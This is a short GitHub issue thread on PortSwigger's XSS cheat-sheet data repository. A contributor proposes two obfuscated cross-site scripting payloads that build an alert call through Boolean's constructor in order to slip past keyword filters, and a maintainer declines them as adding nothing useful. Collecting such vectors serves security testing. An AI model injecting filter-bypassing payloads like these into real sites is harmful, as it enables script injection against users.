### ISSUE TITLE
XSS attack using the constructor property

### ISSUE THREAD

**Issue by LRTK-CODER** [PortSwigger/xss-cheatsheet-data#50]
I also want to contribute, so I am asking this question.
Is it possible to contribute with the following payload as well?

```
<img/src/onerror=Boolean['constructor']('al'+'er'+'t('+'"L'+'RT'+'K")')()>
<img/src/onerror=Boolean[`co`+`ns`+`tr`+`uc`+`tor`](`al`+`er`+`t(`+`'L`+`RT`+`K')`)()>
```

**Comment by hackvertor** [comment]
I don't think these vectors offer anything useful for the cheat sheet. Please consider having a scenario in mind such as a limited amount of characters because of site restrictions etc thanks
